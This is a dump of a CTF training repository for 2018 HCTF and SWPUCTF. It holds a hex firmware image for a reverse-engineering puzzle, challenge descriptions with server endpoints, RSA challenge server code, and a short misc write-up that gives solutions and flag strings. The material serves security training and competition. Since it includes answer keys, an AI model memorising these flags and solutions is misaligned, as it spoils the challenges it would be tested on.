570 | :207AA0008EBB1CD28091E10084FF2CC08091E20084FF28C080E189BD82E189BD09B400FEC5
571 | :207AC000FDCF8091D8008F7D8093D8008091E1008F7E8093E1008091E2008F7E8093E20012
572 | :207AE0008091E20081608093E2008091B401882331F48091E30087FD02C081E001C084E067
573 | :207B00008EBBECD18091E10083FF21C08091E20083FF1DC08091E100877F8093E10082E06A
574 | :207B20008EBB1092B4018091E1008E7F8093E1008091E2008E7F8093E2008091E2008061E9
575 | :207B40008093E20080E060E042E0D8DEC7D1FF91EF91BF91AF919F918F917F916F915F9130
576 | :207B60004F913F912F910F900FBE0F901F9018959C014091BC015091BD014617570718F49D
577 | :207B8000F90190E044C06115710511F0AB01F8CF8091E8008E778093E80040E050E0F0CF0F
578 | :207BA0008EB3882309F444C0853009F443C08091E80083FF02C081E008958091E80082FD70
579 | :207BC00031C08091E80080FF22C08091F3009091F200782F60E0292F30E0262B372B07C07A
580 | :207BE00081918093F100415050402F5F3F4F4115510519F02830310598F390E02830310566
581 | :207C000009F491E08091E8008E778093E8004115510531F6992321F605C08EB3882341F075
582 | :207C2000853041F08091E80082FFF7CF80E0089582E0089583E008959C016115710529F47C
583 | :207C40008091E8008B778093E800F90126C08EB3882391F1853091F18091E80083FF02C06C
584 | :207C600081E008958091E80082FFF1CF06C08091F10081936150704059F02091F300809191
585 | :207C8000F200322F20E090E0822B932B892B79F78091E8008B778093E80061157105B9F601
586 | :207CA00005C08EB3882341F0853041F08091E80080FFF7CF80E0089582E0089583E00895C2
587 | :207CC0000F931F93DF93CF9300D0CDB7DEB7E6EBF1E08091F100819381E0EE3BF807C9F792
588 | :207CE00024DD8091E80083FFE4C08091B6019091B701953009F46DC0963040F4913081F1A7
589 | :207D0000913070F0933009F0D4C02AC0983009F4A3C0993009F4B2C0963009F0CAC07CC023
590 | :207D2000803809F4C6C0823809F0C3C08091BA0187708093E9008091EB001092E9002091DB
591 | :207D4000E800277F2093E80090E025E0969587952A95E1F781708093F1001092F10087C0D8
592 | :207D6000882319F0823009F0A4C08F71823009F0A0C08091B801882331F52091BA01277097
593 | :207D800009F497C02093E9008091EB0080FF1BC0933021F48091EB00806213C08091EB0018
594 | :207DA00080618093EB0081E090E002C0880F991F2A95E2F78093EA001092EA008091EB00E5
595 | :207DC00088608093EB001092E9008091E800877F51C0882309F06DC01091B8011F770FB79B
596 | :207DE000F8948091E800877F8093E8009ADD8091E80080FFFCCF8091E3008078812B809398
597 | :207E0000E30080688093E300112311F482E001C083E08EBB0FBF4DC08058823008F049C033
598 | :207E20008091B8019091B9016091BA01AE014F5F5F4F36DDBC01009709F43BC08091E8008E
599 | :207E4000877F8093E80089819A8192DE8091E8008B778093E8002DC0803859F58091E800AA
600 | :207E6000877F8093E8008091B4018093F1008091E8008E778093E80054DD1BC08823C9F4CA
601 | :207E80009091B8019230A8F48091E800877F8093E8009093B40145DD8091B401882331F420
602 | :207EA0008091E30087FD02C081E001C084E08EBB6CDC8091E80083FF0AC08091EB0080624E
603 | :207EC0008093EB008091E800877F8093E8000F900F90CF91DF911F910F91089508951F9360
604 | :207EE0008EB3882361F01091E9001092E9008091E80083FF01C0E4DE17701093E9001F916F
605 | :207F00000895F999FECF92BD81BDF89A992780B50895262FF999FECF1FBA92BD81BD20BDBD
606 | :207F20000FB6F894FA9AF99A0FBE01960895F894FFCF4341544552494E4100777700080031
607 | :207F40000000000000080112011001020000084123360001000201000109023E00020100FF
608 | :207F600080320904000001020201000524001001042402040524060001070582030800FF0C
609 | :207F800009040100020A000000070504021000010705830210000104030904220341007216
610 | :207FA000006400750069006E006F0020004C0065006F006E006100720064006F0000001836
611 | :1A7FC00003410072006400750069006E006F0020004C004C004300000000D7
612 | :00000001FF
613 | 


--------------------------------------------------------------------------------
/2018/hctf/Rev/PolishDuck/desc.txt:
--------------------------------------------------------------------------------
1 | May not a kind of food.And may not about Polish.


--------------------------------------------------------------------------------
/2018/hctf/Rev/[Rev] seven/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | Flag consists of lowercase letters and symbols. Please add hctf{} when submitting.
3 | backup: https://hctf-1253126740.cos.ap-hongkong.myqcloud.com/seven.sys
4 | backup: https://1drv.ms/u/s!AnQlXcMxEIRbgxsPsABMdZUTQpQ4


--------------------------------------------------------------------------------
/2018/hctf/Rev/[Rev] seven/seven.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/Rev/[Rev] seven/seven.sys


--------------------------------------------------------------------------------
/2018/hctf/Rev/[Rev] spiral/Spiral.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/Rev/[Rev] spiral/Spiral.exe


--------------------------------------------------------------------------------
/2018/hctf/Rev/[Rev] spiral/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | Go back ten years ago.
3 | backup: https://hctf-1253126740.cos.ap-hongkong.myqcloud.com/Spiral.exe
4 | backup: https://1drv.ms/u/s!AnQlXcMxEIRbgxrVmNEPY4KE8Z7q


--------------------------------------------------------------------------------
/2018/hctf/crypto/xor game/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | This is an English poem, but it is encrypted. Find the flag and restore it (also you can just submit the flag).
3 | http://img.tan90.me/xor_game.zip


--------------------------------------------------------------------------------
/2018/hctf/crypto/xor game/xor_game.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/crypto/xor game/xor_game.zip


--------------------------------------------------------------------------------
/2018/hctf/crypto/xorrsa/challenge.py:
--------------------------------------------------------------------------------
 1 | from Crypto.Util.number import *
 2 | import SocketServer
 3 | import string
 4 | import hashlib
 5 | import random
 6 | import requests
 7 | import json
 8 | from flag import *
 9 | 
10 | class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
11 |     pass
12 | 
13 | 
14 | class RSATCPHandler(SocketServer.BaseRequestHandler):
15 |     def handle(self):
16 |         self.request.sendall("Welcome to flag getting system\ngive me your token > ")
17 |         token = self.request.recv(1024).strip()
18 |         if not verify(token):
19 |             self.request.sendall("token error\n")
20 |         else:
21 |             p = getStrongPrime(1024)
22 |             q = getStrongPrime(1024)
23 |             n = p * q
24 |             e = 5
25 |             nbits = size(n)
26 |             kbits = nbits // (2 * e * e)
27 |             m1 = getRandomNBitInteger(nbits)
28 |             m2 = m1 ^ getRandomNBitInteger(kbits)
29 |             c1 = pow(m1, e, n)
30 |             c2 = pow(m2, e, n)
31 | 
32 |             self.request.sendall("n=" + str(n) + "\n")
33 |             self.request.sendall("c1=" + str(c1) + "\n")
34 |             self.request.sendall("c2=" + str(c2) + "\n")
35 | 
36 |             self.request.sendall("now give me you answer\n")
37 |             ans1 = self.request.recv(2048).strip()
38 |             ans2 = self.request.recv(2048).strip()
39 | 
40 |             if str(ans1) == str(m1) and str(ans2) == str(m2):
41 |                 self.request.sendall(FLAG)
42 |             else:
43 |                 self.request.sendall("wrong answer\n")
44 | 
45 | if __name__ == "__main__":
46 |     HOST, PORT = "0.0.0.0", 10086
47 |     server = ThreadedTCPServer((HOST, PORT), RSATCPHandler)
48 |     server.serve_forever()


--------------------------------------------------------------------------------
/2018/hctf/crypto/xorrsa/desc.txt:
--------------------------------------------------------------------------------
1 | xor?Can this really be done?have a try. 
2 | http://img.tan90.me/rsa.py 
3 | nc rsa.2018.hctf.io 10086
4 | add pow and port 10086->10087


--------------------------------------------------------------------------------
/2018/hctf/crypto/xorrsa/rsa.py:
--------------------------------------------------------------------------------
 1 | from Crypto.Util.number import *
 2 | import SocketServer
 3 | import string
 4 | import hashlib
 5 | import random
 6 | import requests
 7 | import json
 8 | from flag import *
 9 | 
10 | class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
11 |     pass
12 | 
13 | 
14 | class RSATCPHandler(SocketServer.BaseRequestHandler):
15 |     def handle(self):
16 |         self.request.sendall("Welcome to flag getting system\ngive me your token > ")
17 |         token = self.request.recv(1024).strip()
18 |         if not verify(token):
19 |             self.request.sendall("token error\n")
20 |         else:
21 |             p = getStrongPrime(1024)
22 |             q = getStrongPrime(1024)
23 |             n = p * q
24 |             e = 5
25 |             nbits = size(n)
26 |             xorbits = nbits // (2 * e * e)
27 |             m1 = getRandomNBitInteger(nbits)
28 |             m2 = m1 ^ getRandomNBitInteger(xorbits)
29 |             c1 = pow(m1, e, n)
30 |             c2 = pow(m2, e, n)
31 | 
32 |             self.request.sendall("n=" + str(n) + "\n")
33 |             self.request.sendall("c1=" + str(c1) + "\n")
34 |             self.request.sendall("c2=" + str(c2) + "\n")
35 | 
36 |             self.request.sendall("now give me you answer\n")
37 |             ans1 = self.request.recv(2048).strip()
38 |             ans2 = self.request.recv(2048).strip()
39 | 
40 |             if str(ans1) == str(m1) and str(ans2) == str(m2):
41 |                 self.request.sendall(FLAG)
42 |             else:
43 |                 self.request.sendall("wrong answer\n")
44 | 
45 | if __name__ == "__main__":
46 |     HOST, PORT = "0.0.0.0", 10086
47 |     server = ThreadedTCPServer((HOST, PORT), RSATCPHandler)
48 |     server.serve_forever()


--------------------------------------------------------------------------------
/2018/hctf/misc/Guess My Key/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | Here is a simple encryption system, you can treat it as a function: 
3 | C = F_enc(P, K)
4 | 
5 | where C is the ciphertext, P is the plaintext, K is the key you have to figure out what it is. 
6 | The specific mapping rules of F_enc is automatically learned by machine learning tricks (So I don't know what it actually is in fact). 
7 | The provided API "/enc?msg=xxx&key=xxx", will expose some information of this mapping rules to you, you have to make full use of these clues and find out what the REAL_KEY is (you can replace it with your own key but you cannot read it directly). 
8 | P.S. You should wrap the correctly converted REAL_KEY with "hctf{" and "}" manually.
9 | URL http://150.109.62.46:13577/


--------------------------------------------------------------------------------
/2018/hctf/misc/Questionnaire/desc.txt:
--------------------------------------------------------------------------------
1 | /


--------------------------------------------------------------------------------
/2018/hctf/misc/Questionnaire/flag.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/misc/Questionnaire/flag.pdf


--------------------------------------------------------------------------------
/2018/hctf/misc/difficult programming language/desc.txt:
--------------------------------------------------------------------------------
1 | You have captured a packet.Let's see what you can get from it. backup link: https://pan.baidu.com/s/1CUVmt90ik_XVdlX3JNZOzQ


--------------------------------------------------------------------------------
/2018/hctf/misc/difficult programming language/difficult_programming_language.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/misc/difficult programming language/difficult_programming_language.zip


--------------------------------------------------------------------------------
/2018/hctf/misc/eazy dump/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | you got it?
3 | backup1:https://pan.baidu.com/s/1X6xSV6Vn6J_F467P3zuoBw
4 | backup2:https://drive.google.com/file/d/1i17hd-kmUqpWvpzLiw3HYNwUz4ToBkq8/view?usp=sharing
5 | URL https://mega.nz/#!MRlVCagA!PO2-h65ioxi4id2mEHHmrKtqGBndgk_3jwHUmLlSkV8


--------------------------------------------------------------------------------
/2018/hctf/misc/freq game/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | this is a eazy game. nc 150.109.119.46 6775


--------------------------------------------------------------------------------
/2018/hctf/pwn/[Pwn] the end/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | where is the end? 
3 | nc 150.109.44.250 20002 
4 | nc 150.109.46.159 20002


--------------------------------------------------------------------------------
/2018/hctf/pwn/[Pwn] the end/the_end_890eb79d67925bd059ffb9ba60697f4d19cc2bbd923f474b2a84daaa22e59068.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/pwn/[Pwn] the end/the_end_890eb79d67925bd059ffb9ba60697f4d19cc2bbd923f474b2a84daaa22e59068.zip


--------------------------------------------------------------------------------
/2018/hctf/pwn/baby printf ver2/babyprintf_ver2_99aaef89552b3713c7dc756f96475b9bdd6c6558f5ba44572bde923f33a30f23.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/pwn/baby printf ver2/babyprintf_ver2_99aaef89552b3713c7dc756f96475b9bdd6c6558f5ba44572bde923f33a30f23.zip


--------------------------------------------------------------------------------
/2018/hctf/pwn/baby printf ver2/desc.txt:
--------------------------------------------------------------------------------
1 | baby printf comes again :) 
2 | nc 150.109.44.250 20005 
3 | nc 150.109.46.159 20005


--------------------------------------------------------------------------------
/2018/hctf/pwn/christmas/christmas_cb187339cda7c78f10f6c892214b37e9330e3d504a09fb2de34b3d94b18f69aa.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/pwn/christmas/christmas_cb187339cda7c78f10f6c892214b37e9330e3d504a09fb2de34b3d94b18f69aa.zip


--------------------------------------------------------------------------------
/2018/hctf/pwn/christmas/desc.txt:
--------------------------------------------------------------------------------
1 | update: server is ubuntu 16.04 ,libc equal to the_end (if needed) 
2 | libflag.so on server is generated by gen.py randomly , and it won't provide to you :p 
3 | nc 150.109.44.250 20003 
4 | nc 150.109.46.159 20003


--------------------------------------------------------------------------------
/2018/hctf/pwn/easyexp/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | read /home/ctf/flag 
3 | nc 150.109.44.250 20004 
4 | nc 150.109.46.159 20004
5 | hint:plz pay attention to libc version and try to load the libc which we given


--------------------------------------------------------------------------------
/2018/hctf/pwn/easyexp/easyexp_06bd96b5f874f02d6564c2583818f2fe207e8e57d1fcc0a9729cfff288af82df.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/pwn/easyexp/easyexp_06bd96b5f874f02d6564c2583818f2fe207e8e57d1fcc0a9729cfff288af82df.zip


--------------------------------------------------------------------------------
/2018/hctf/pwn/heapstorm zero/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | some old school trick :p 
3 | nc 150.109.44.250 20001 
4 | nc 150.109.46.159 20001


--------------------------------------------------------------------------------
/2018/hctf/pwn/heapstorm zero/heapstorm_zero_1f967ddec00ba70bf22411c53c663d5f859d8af3dcdb8f1ed21f2e25d78b239e.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/pwn/heapstorm zero/heapstorm_zero_1f967ddec00ba70bf22411c53c663d5f859d8af3dcdb8f1ed21f2e25d78b239e.zip


--------------------------------------------------------------------------------
/2018/swpuctf/README.md:
--------------------------------------------------------------------------------
1 | ## Writeup
2 | 
3 | -[官方wp](https://www.anquanke.com/post/id/168338)
4 | 


--------------------------------------------------------------------------------
/2018/swpuctf/bin/bin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/bin/bin.png


--------------------------------------------------------------------------------
/2018/swpuctf/bin/exploit_1/exploit_1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/bin/exploit_1/exploit_1


--------------------------------------------------------------------------------
/2018/swpuctf/bin/exploit_1/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/bin/exploit_1/libc.so.6


--------------------------------------------------------------------------------
/2018/swpuctf/misc/Easy.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/misc/Easy.zip


--------------------------------------------------------------------------------
/2018/swpuctf/misc/flag.txt:
--------------------------------------------------------------------------------
1 | 99 9 9 88 11 5 5 66 3 88 3 6 555 9 11 4 33
2 | 
3 | 


--------------------------------------------------------------------------------
/2018/swpuctf/misc/hello.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/misc/hello.pcapng


--------------------------------------------------------------------------------
/2018/swpuctf/misc/misc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/misc/misc.png


--------------------------------------------------------------------------------
/2018/swpuctf/mobile/app-debug1.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/mobile/app-debug1.apk


--------------------------------------------------------------------------------
/2018/swpuctf/mobile/app-debug2.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/mobile/app-debug2.apk


--------------------------------------------------------------------------------
/2018/swpuctf/mobile/mobie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/mobile/mobie.png


--------------------------------------------------------------------------------
/2018/swpuctf/reverse/re1/CM1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/reverse/re1/CM1.exe


--------------------------------------------------------------------------------
/2018/swpuctf/reverse/re2/CM2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/reverse/re2/CM2.exe


--------------------------------------------------------------------------------
/2018/swpuctf/reverse/re4/CM3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/reverse/re4/CM3.exe


--------------------------------------------------------------------------------
/2018/swpuctf/reverse/reverse.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/reverse/reverse.png


--------------------------------------------------------------------------------
/2018/swpuctf/web/web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/web/web.png


--------------------------------------------------------------------------------
/2018/swpuctf/web/www.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/web/www.zip


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/miscwp-0191e320.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/miscwp-0191e320.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/miscwp-82fc9b95.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/miscwp-82fc9b95.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/miscwp-b1176f6a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/miscwp-b1176f6a.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/miscwp-c1a41fa4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/miscwp-c1a41fa4.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-14aa208b.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-14aa208b.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-1f42159a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-1f42159a.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-24b1d07d.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-24b1d07d.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-32e6e4be.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-32e6e4be.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-36b393dc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-36b393dc.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-3f1f76c0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-3f1f76c0.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-3fff575c.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-3fff575c.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-5443d107.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-5443d107.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-5eb078e4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-5eb078e4.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-5fc2bade.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-5fc2bade.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-62e01155.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-62e01155.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-6e86a328.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-6e86a328.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-74eab9af.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-74eab9af.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-7e521145.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-7e521145.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-807d3a06.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-807d3a06.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-82d31b8a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-82d31b8a.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-971cb144.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-971cb144.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-999d3929.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-999d3929.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-a5447514.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-a5447514.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-b1ad87e0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-b1ad87e0.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-b723271d.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-b723271d.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-bc510790.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-bc510790.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-c2e27f84.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-c2e27f84.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-e8c71ac5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-e8c71ac5.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-e8e9f208.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-e8e9f208.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-ee1e6186.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-ee1e6186.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-ef91f632.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-ef91f632.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-f89cee69.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-f89cee69.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/assets/webwp-ff3f7dad.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/swpuctf/writeup/assets/webwp-ff3f7dad.png


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/miscwp.md:
--------------------------------------------------------------------------------
 1 | ## 签到题
 2 | 改一下图片高度
 3 | ![](assets/miscwp-82fc9b95.png)
 4 | ![](assets/miscwp-0191e320.png)
 5 | flag：flag{b2b85ec7ec8cc4771b8d055aee5f82b0}
 6 | 
 7 | ## 唯有低头，才能出头
 8 | 了一行字符串：99 9 9 88 11 5 5 66 3 88 3 6 555 9 11 4 33
 9 | 
10 | 根据题目意思应该是键盘密码，数字的重复次数代表第几行。99代表9下面第二行的L，9代表9下面第一行的o，以此类推。
11 | 
12 | ![](assets/miscwp-c1a41fa4.png)
13 | 
14 | ## 流量签到
15 | 记事本打开，搜索flag。
16 | ![](assets/miscwp-b1176f6a.png)
17 | flag：SWPUCTF{Th1s_i3_e4sy_pc@p}
18 | 


--------------------------------------------------------------------------------
/2018/swpuctf/writeup/pwnwp.md:
